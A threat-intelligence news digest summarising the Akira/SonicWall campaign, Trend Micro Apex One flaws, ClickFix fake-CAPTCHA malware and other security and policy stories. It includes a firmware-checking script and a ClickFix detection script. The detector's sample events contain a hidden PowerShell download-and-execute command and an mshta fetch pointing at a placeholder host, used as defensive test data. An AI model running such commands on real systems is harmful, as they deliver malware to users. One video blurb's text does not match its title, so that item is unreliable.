Daily Drop (1103)
08-06-25
Wednesday, Aug 06, 2025 // (IG): BB // GITHUB // SN R&D
Akira Ransomware Exploits Suspected Zero-Day in SonicWall SSLVPN Devices
Bottom Line Up Front (BLUF): A series of fast-moving cyberattacks exploiting SonicWall Gen 7 SSLVPN functionality has been linked to Akira ransomware. Attackers bypass multi-factor authentication and deploy ransomware in hours. The campaign likely involves a zero-day vulnerability, prompting SonicWall to urge immediate disabling or restriction of SSLVPN services.
Analyst Comments: The speed and sophistication of Akira's operations show a mature ransomware-as-a-service model with high automation and hands-on capabilities. Given the signs of MFA bypass, privilege escalation, and command and control persistence, defenders must treat any SonicWall VPN exposure as a high-priority threat vector. Dark web chatter further suggests exploit availability may be spreading, emphasizing the need for swift defensive action.
FROM THE MEDIA: The attacks targeted devices running firmware version 7.2.0-7015 or earlier, exploiting SSLVPN services to gain initial access. Attackers quickly escalated privileges using service accounts, established persistence with tools like Cloudflared and OpenSSH, and executed lateral movement using Windows-native tools. Akira actors disabled security defenses and deployed ransomware after credential theft and data exfiltration. SonicWall has issued an urgent advisory recommending SSLVPN services be disabled or restricted to trusted IP addresses until more is known.
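The advisory scopes the campaign to Gen 7 firmware 7.2.0-7015 or earlier, so the first defensive step is an inventory check. The following is an added example (not SonicWall's tooling or code from the article) that parses firmware strings in the `major.minor.patch-build` form shown above, compares them numerically rather than as strings, and lists which devices in a constructed, hypothetical inventory fall inside the affected range. The device names and versions are invented for illustration.

```python
import re
from typing import NamedTuple


class FirmwareVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    build: int


# Assumed format "7.2.0-7015" (major.minor.patch-build), as quoted in the advisory summary.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")


def parse_version(text: str) -> FirmwareVersion:
    """Turn a firmware string into an integer tuple so 7.10.x sorts after 7.2.x."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version string: {text!r}")
    return FirmwareVersion(*(int(g) for g in m.groups()))


# Ceiling quoted in the article: 7.2.0-7015 or earlier is in scope.
LAST_AFFECTED = parse_version("7.2.0-7015")


def is_in_affected_range(version_text: str) -> bool:
    v = parse_version(version_text)
    # The advisory summary covers Gen 7 firmware only; other generations are out of scope here.
    return v.major == 7 and v <= LAST_AFFECTED


# Constructed inventory (hypothetical device names and firmware versions).
INVENTORY = {
    "fw-hq-edge": "7.2.0-7015",    # exactly the ceiling: affected
    "fw-branch-a": "7.1.3-7015",   # older minor release: affected
    "fw-branch-b": "7.2.0-7016",   # one build newer: not affected
    "fw-lab": "7.10.0-7000",       # string compare would wrongly rank this below 7.2.0
    "fw-legacy": "6.5.4-4000",     # Gen 6, not discussed by the advisory summary
}


def devices_needing_attention(inventory: dict[str, str]) -> list[str]:
    """Return sorted device names whose firmware is within the affected range."""
    return sorted(name for name, ver in inventory.items() if is_in_affected_range(ver))


if __name__ == "__main__":
    for name in devices_needing_attention(INVENTORY):
        print(f"{name}: SSLVPN should be disabled or restricted to trusted source IPs")
```

The numeric comparison matters: a plain string comparison would rank "7.10.0-7000" below "7.2.0-7015" and falsely flag a newer device. The script only identifies devices; the advisory's guidance to disable or restrict SSLVPN still applies regardless of version until more is known.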
READ THE STORY: SOCRadar
‘South Park’ Clashes with Homeland Security Over Satirical Trump Episode
NOTE:
When institutions publicly react to satire—especially with visible frustration—they inadvertently reveal their psychological triggers. In doing so, they hand satirists a roadmap of what provokes a response, effectively showing their cards. This emotional visibility shifts the power dynamic: the provocateur gains control by knowing which buttons to press. In media warfare, this is not just a tactical error—it’s a strategic misstep. Once you signal what gets under your skin, you invite repetition. Satire thrives on pattern recognition and emotional cues; you validate the satire’s relevance by reacting and empowering its creators to escalate with precision. In short, if you flinch, they aim again.
Bottom Line Up Front (BLUF): “South Park” ignited a public feud with the U.S. Department of Homeland Security (DHS) ahead of its latest episode, which targets former President Trump and ICE operations. DHS responded defensively on X (formerly Twitter), prompting a viral exchange that underscores ongoing tensions between the animated series and the Trump administration.
Analyst Comments: While satire has always been political, the escalation of direct engagement by federal agencies like DHS marks a shift toward a more reactive media posture. The response may inadvertently amplify the show’s message, signaling how public institutions navigate satire in a polarized information environment. The episode also taps into broader anxieties around immigration, state surveillance, and media censorship heading into the 2026 election cycle.
FROM THE MEDIA: Forbes reported that Comedy Central’s “South Park” drew backlash from DHS after teasing its second episode of season 27, which mocks ICE raids and portrays Trump as a recurring, absurd figure, often in compromising scenes with Satan. A teaser image showed Mr. Mackey in ICE gear alongside a character resembling DHS Secretary Kristi Noem. DHS posted a response encouraging job applications, while “South Park” fired back with a profanity-laced retort that revived criticism of the White House’s earlier claim that the show was “irrelevant.” The new episode, titled “Got A Nut,” continues the show's unfiltered critique of Trump’s policies and persona, especially on immigration and religion in schools. It airs on Comedy Central and streams on Paramount+, where all episodes are moving under a $1.5 billion deal.
READ THE STORY: Forbes
Trend Micro Confirms Active Exploitation of Critical Apex One RCE Vulnerabilities (CVE-2025-54948 & CVE-2025-54987)
Bottom Line Up Front (BLUF): Trend Micro has disclosed two critical vulnerabilities in its on-premise Apex One Management Console—CVE-2025-54948 and CVE-2025-54987—both rated CVSS 9.4. The flaws allow pre-authenticated attackers to execute remote code, and at least one exploitation attempt has been detected in the wild.
Analyst Comments: Exploiting these pre-authentication RCE flaws in a security management product is particularly dangerous, as attackers could gain administrative access to systems that are supposed to serve as defensive control points. The incident underscores the increasing trend of adversaries targeting security tools, echoing recent campaigns against other endpoint detection platforms. Organizations should prioritize applying the temporary fix and prepare for the formal patch release mid-August while reassessing remote access policies for all security-critical infrastructure.
FROM THE MEDIA: CVE-2025-54948 and CVE-2025-54987—both rated 9.4—allow unauthenticated remote attackers to upload malicious code and execute commands. The second identifier covers a variant affecting a different CPU architecture. The flaws were reported by Trend Micro's IR team and Jacky Hsieh at CoreCloud Tech. Although exploitation details remain scarce, Trend Micro confirmed at least one instance of in-the-wild abuse. A mitigation tool has been made available but temporarily disables the Remote Install Agent function. A full patch is expected mid-August.
READ THE STORY: THN
China’s Online Abuse Scandal Exposes State Inaction on Gendered Cybercrime
Bottom Line Up Front (BLUF): A widespread cyber-abuse scandal in China has revealed systemic failures to address the covert filming and digital exploitation of women, including AI-generated pornography from non-consensual images. Critics argue that authorities prioritize political censorship over enforcement against online sexual violence, leaving victims without adequate legal protection or recourse.
Analyst Comments: The Chinese state’s ability to surveil and censor political dissent contrasts starkly with its inaction on digital abuse against women. As generative AI and encrypted platforms become more embedded in exploitation chains, victims will remain vulnerable unless governments adopt specialized cyber laws, robust enforcement mechanisms, and gender-sensitive training for law enforcement. The current approach risks normalizing tech-enabled misogyny and eroding digital trust.
FROM THE MEDIA: The footage, often manipulated with AI tools to create pornographic deepfakes, has been circulated in large Telegram groups like “MaskPark,” which reportedly had over 100,000 members. While Chinese law criminalizes distributing pornography and unauthorized photography, critics—including legal experts and feminist activists—argue that enforcement is weak and legal thresholds are high. Meanwhile, censors have focused on silencing feminist voices rather than dismantling abuse networks. The scandal underscores the failure of digital governance to protect women’s rights in China’s tightly controlled cyberspace.
READ THE STORY: The Guardian
Meta Found Liable in Class-Action Over Flo App’s Unauthorized Sharing of Menstrual Health Data
Bottom Line Up Front (BLUF): A California jury has ruled that Meta violated state privacy laws by collecting sensitive menstrual health data from users of the Flo app without consent. The case, filed in 2021, accused Meta and other tech firms of using this data for ad-tracking purposes, with Google and Flo settling earlier. Meta denies wrongdoing and plans to appeal.
Analyst Comments: Meta's loss may set a legal precedent affecting how platforms handle third-party app data and could prompt developers to reassess SDK integrations and consent flows. The decision also reinforces California's leadership in digital privacy enforcement and may accelerate national or federal-level privacy initiatives targeting reproductive and biometric data.
FROM THE MEDIA: Plaintiffs argued that Meta received period dates and fertility-related information via app trackers without user consent, breaching state privacy laws. Meta, alongside Google, AppsFlyer, and Flurry, was named in the original 2021 lawsuit. While Google and Flo settled, Meta contested the allegations, asserting that it forbids developers from sending sensitive data. Despite this defense, the jury sided with the plaintiffs, signaling increased legal risk for platforms engaged in behavioral ad targeting using personal health data.
READ THE STORY: TC
RUSI Urges Cross-Domain Cyber Deterrence Strategy Amid Rising Geopolitical Threats
Bottom Line Up Front (BLUF): Traditional cyber deterrence models have proven obsolete in addressing contemporary threats, according to an August 5, 2025, RUSI analysis. The report emphasizes that current gray-zone conflicts and multipolar dynamics demand an integrated deterrence framework capable of responding to pre-positioned cyber infrastructure from nations like Russia and China.
Analyst Comments: RUSI’s research reflects an evolving consensus in strategic cyber policy: deterrence is no longer a binary “punishment vs. denial” equation but a spectrum of actions that span military, diplomatic, economic, and informational domains. This approach is especially critical as adversaries increasingly employ stealthy, sustained campaigns below the threshold of armed conflict. The emphasis on cumulative, tailored responses and acknowledgment of pre-positioning tactics signals a shift toward dynamic defense and resilience over retaliation alone. Western cyber doctrines may soon need to mirror this layered strategy to remain effective.
FROM THE MEDIA: Despite the absence of a catastrophic cyberattack, ongoing threats—particularly from Russia and China—reveal the limitations of current deterrence models. The report suggests that cyber deterrence must be understood as a continuum of preventive and responsive measures, adaptable to gray-zone activity and significant incidents. It emphasizes the need for deterrence strategies that are iterative, cumulative, and embedded across national security ecosystems, including military, economic, and cyber policy domains.
READ THE STORY: RUSI
Arrest of Alleged XSS Admin Sparks Turmoil in Russian Cybercrime Underground
Bottom Line Up Front (BLUF): A 38-year-old man was arrested in Kyiv on July 22, 2025, suspected of administering XSS, a prominent Russian-language cybercrime forum. While Europol and Ukraine’s SBU have not publicly named the individual, circumstantial evidence strongly suggests the detainee is Anton Gannadievich Medvedovskiy, a longtime figure in the cybercriminal ecosystem known by the alias “Toha.” The arrest has sent shockwaves through the cybercrime underground, especially among ransomware-affiliated communities.
Analyst Comments: XSS served as a key marketplace and communication hub for ransomware groups, including REvil, Conti, and LockBit. Beyond the individual arrest, law enforcement agencies now potentially possess years of encrypted messaging logs, forum metadata, and user credentials, providing rare visibility into illicit ecosystems. Forum users are panicking over possible deanonymization through AI-assisted analysis. Expect a chilling effect on trust-based forums and a potential migration to decentralized or invite-only platforms.
FROM THE MEDIA: The suspect reportedly operated thesecure[.]biz, a Jabber server used by cybercriminals, and acted as a dispute arbitrator and escrow agent within XSS. XSS has since relaunched on a new Tor address, but long-standing members report distrust toward new administrators, loss of funds, and fear that private data is now in law enforcement’s hands. The disruption has generated paranoia across the Russian-speaking cybercrime community, especially with AI tools now capable of analyzing writing style, metadata, and user relationships to unmask pseudonymous actors.
READ THE STORY: Krebs on Security
Cisco Discloses CRM Breach After Vishing Attack Compromises User Account Data
Bottom Line Up Front (BLUF): Cisco has reported a data breach involving a third-party CRM system that exposed user account information from Cisco.com. The breach, traced to a vishing (voice phishing) attack targeting a Cisco representative, allowed the threat actor to access registered users' names, email addresses, phone numbers, and other non-sensitive metadata.
Analyst Comments: While no sensitive credentials or proprietary customer data were compromised, the incident underscores the importance of extending zero-trust principles and phishing-resistant training beyond email-based threats. Given Cisco’s recent security scrutiny, cumulative reputational risk could impact enterprise trust unless transparency and remediation remain strong.
FROM THE MEDIA: The attacker gained access to a subset of user data tied to Cisco.com accounts, including personal contact details and Cisco-assigned user IDs. Cisco stated no passwords or sensitive customer data were accessed, and its core products and services were unaffected. Affected individuals and regulators have been notified. The company is implementing additional security measures and re-training staff to recognize vishing threats. This follows an earlier 2024 breach, where the IntelBroker hacker leaked data from Cisco’s DevHub platform.
READ THE STORY: SECWEEK
China-Linked Hackers Target Tibetan Community with Malware Disguised as Dalai Lama Apps
Bottom Line Up Front (BLUF): Two cyber espionage campaigns—Operation GhostChat and Operation PhantomPrayers—targeted the Tibetan community using fake apps themed around the Dalai Lama’s 90th birthday. According to Zscaler ThreatLabz and TibCERT, the attackers used culturally tailored lures to deploy Gh0st RAT and PhantomNet spyware, linked to Chinese state-sponsored actors.
Analyst Comments: The combination of advanced remote access tools and trusted community channels (e.g., charity websites) reveals a sophisticated level of social engineering. Chinese threat actors have consistently employed such watering hole tactics, and this campaign underscores Beijing’s continued targeting of Tibetan digital spaces. Future attacks may blend more generative AI and localization tactics, especially as significant political anniversaries or events approach.
FROM THE MEDIA: Chinese-linked hackers orchestrated two coordinated cyberattacks—“GhostChat” and “PhantomPrayers”—against the Tibetan community during the Dalai Lama’s 90th birthday celebrations. In GhostChat, attackers hijacked a legitimate Tibetan charity website and redirected visitors to a nearly identical fake site, offering a culturally branded secure messaging app that deployed Gh0st RAT spyware. PhantomPrayers lured users into downloading a fake interactive map app, allowing global users to send birthday wishes to the Dalai Lama, which covertly installed PhantomNet malware. These operations enabled complete remote surveillance of victims, including keylogging, webcam/mic access, and data theft. Researchers linked the tools and tactics to known Chinese APTs such as EvilBamboo and TAG-112.
READ THE STORY: CYBER NEWS
China Investigates Nvidia H20 Chip Over Alleged Backdoor; Nvidia Denies Security Breach
Bottom Line Up Front (BLUF): China’s Cyberspace Administration (CAC) has launched a probe into Nvidia’s H20 AI chip amid allegations of backdoor vulnerabilities that could threaten national security. Nvidia has publicly denied the presence of any backdoor, affirming that its chips comply with all regulatory requirements and are shipped with the full consent of its partners.
Analyst Comments: The probe could threaten Nvidia’s foothold in the lucrative Chinese AI market, especially if trust in hardware security is eroded. Should China find evidence supporting its suspicions—or even use the probe as a geopolitical lever—it could accelerate domestic development of alternative AI chips, and further decouple global AI hardware ecosystems.
FROM THE MEDIA: This comes after the Cyberspace Administration of China began investigating the chip’s architecture and firmware. The article, behind a DIGITIMES paywall, confirms that Chinese regulators are treating the matter seriously and links the probe to broader concerns about foreign control over AI infrastructure. Nvidia has denied any wrongdoing and asserted that all H20 shipments comply with international standards and customer agreements. The company warned earlier that U.S. chip restrictions may drive Chinese companies toward domestic alternatives like Huawei.
READ THE STORY: DigiTimes
ClickFix Malware Exploits Fake CAPTCHAs in State-Sponsored Attacks Across Platforms
Bottom Line Up Front (BLUF): ClickFix is a cross-platform malware campaign that uses fake CAPTCHAs to deceive users into executing malicious code via clipboard hijacking. Initially observed in 2024, the technique has been adopted by state-sponsored actors from Iran, Russia, and North Korea for phishing, RAT deployment, and ransomware attacks. Experts warn that user education and clipboard monitoring are critical defenses.
Analyst Comments: Its cross-platform nature and adoption by APT groups highlight how deceptive UX tactics are now core to advanced cyber campaigns. Future iterations may exploit browser extensions or mobile gesture inputs, raising concerns about the adequacy of current detection methods. Organizations must treat web-based social engineering as a primary threat vector and invest in behavioral analytics.
FROM THE MEDIA: The malware appears as fake CAPTCHAs on phishing or compromised sites, prompting users to paste malicious code into terminals or run dialogs. This has led to infections on Windows, macOS, and mobile platforms. Russian groups reportedly used a variant to deploy LOSTKEYS malware against NGOs and media personnel. By May 2025, threat actors tunneled malicious traffic through Cloudflare Tunnels and expanded the malware’s reach using CastleLoader and ransomware variants like Epsilon Red. With 469 systems confirmed compromised and victims in North America and Europe, experts recommend defenses such as clipboard monitoring and training users to distrust abnormal prompts.
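The lure above ends with the user pasting a clipboard payload into a terminal or the Run dialog, which on Windows typically shows up in endpoint telemetry as explorer.exe spawning a script host with a long, URL-bearing command line. The following is an added detection example (not code from the article or from any vendor) that runs simple heuristics over constructed, hypothetical process-creation events. The indicator patterns and the interpreter list are assumptions chosen for illustration, not signatures taken from the page.

```python
import re
from typing import NamedTuple


class ProcessEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str


# Interpreters and download utilities a pasted one-liner commonly launches
# (heuristic list assumed for this example).
RUN_DIALOG_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line indicators; every pattern here is a heuristic, not an IoC from the article.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "inline_eval": re.compile(r"\biex\b|invoke-expression|invoke-webrequest|\biwr\b|downloadstring", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I),
    "captcha_lure_text": re.compile(r"not a robot|captcha|verification id", re.I),
}


def basename(path: str) -> str:
    """Last path component; handles Windows backslashes even when run on POSIX."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matched_indicators(command_line: str) -> list[str]:
    return [name for name, pat in INDICATORS.items() if pat.search(command_line)]


def is_run_dialog_launch(ev: ProcessEvent) -> bool:
    # Win+R and shell-launched terminals both give explorer.exe as the parent process.
    return basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in RUN_DIALOG_CHILDREN


def scan_events(events: list[ProcessEvent]) -> list[tuple[int, str, list[str]]]:
    """Return (event index, child image, indicator names) for each suspicious launch."""
    findings = []
    for idx, ev in enumerate(events):
        if not is_run_dialog_launch(ev):
            continue
        hits = matched_indicators(ev.command_line)
        if hits:
            findings.append((idx, basename(ev.image), hits))
    return findings


# Constructed sample telemetry (not real captures); example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iex (iwr http://example.invalid/x)" '
                 "# I am not a robot - reCAPTCHA Verification ID: 1234"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/captcha"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\Scripts\maintenance.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoProfile -Command Get-Date"),
]


if __name__ == "__main__":
    for idx, child, hits in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {child} launched from explorer.exe; indicators: {', '.join(hits)}")
```

Only the two lure-style launches are reported: the scheduled script has a service parent rather than explorer.exe, the editor is not a script host, and the interactive PowerShell command matches no indicator. In production the same parent/child test can be applied to Sysmon or EDR process-creation events, and the "verification" comment pattern is worth keeping even though it is trivially removable, because it is cheap and has no benign analogue.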
READ THE STORY: WPN
Items of interest
Anduril’s AI-Driven Drones and Submarines Could Bolster Taiwan’s Defense Against China
Bottom Line Up Front (BLUF): Defense tech company Anduril is developing AI-enabled drones and autonomous submarines that could significantly strengthen Taiwan’s asymmetric capabilities against a potential Chinese invasion. These systems aim to deliver persistent surveillance, rapid response, and low-cost denial in contested maritime zones.
Analyst Comments: Anduril’s autonomous systems are built for real-world battlefields—agile, adaptable, and AI-powered. For Taiwan, they offer a strategic advantage: scalable deterrence without matching China's conventional firepower. These technologies fit squarely within the “porcupine strategy” of denying easy access to Chinese forces. However, integrating such advanced tech introduces cyber and command-and-control risks, especially in GPS- or comms-denied environments. Expect growing U.S.-Taiwan defense tech cooperation to test these systems in the Indo-Pacific theater.
FROM THE MEDIA: These systems, designed for both surveillance and strike missions, can operate in swarms and execute coordinated attacks without direct human control. Experts say they could help Taiwan detect and intercept Chinese naval assets early, especially in a saturation conflict scenario. Anduril’s CEO, Palmer Luckey, has emphasized the strategic utility of AI in modern warfare, and the company’s tech is already in use by U.S. and allied forces. As tensions rise in the Taiwan Strait, such capabilities may prove critical in establishing a resilient, asymmetric defense posture.
READ THE STORY: SAN
Anduril Co-Founder Stephens on Innovating in Defense (Video)
FROM THE MEDIA: Trae Stephens, Co-Founder and Executive Chairman of Anduril Industries, discusses national security innovation, AI defense systems, and the future of military tech. Stephens spoke with Bloomberg’s Tom Giles at Bloomberg Tech in San Francisco.
How China Is Building an Army of Hackers (Video)
FROM THE MEDIA: Anduril is the revolutionary arms company that's shaking up the foundations of the U.S. defense industry. Founded by the eccentric genius Palmer Luckey—yes, the guy in the Hawaiian shirt and sandals—the company competes head-to-head with industry giants and has a clear vision of how future wars will be fought. Get ready to meet the startup changing the military game with artificial intelligence, autonomous sensors, and lethal drones.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.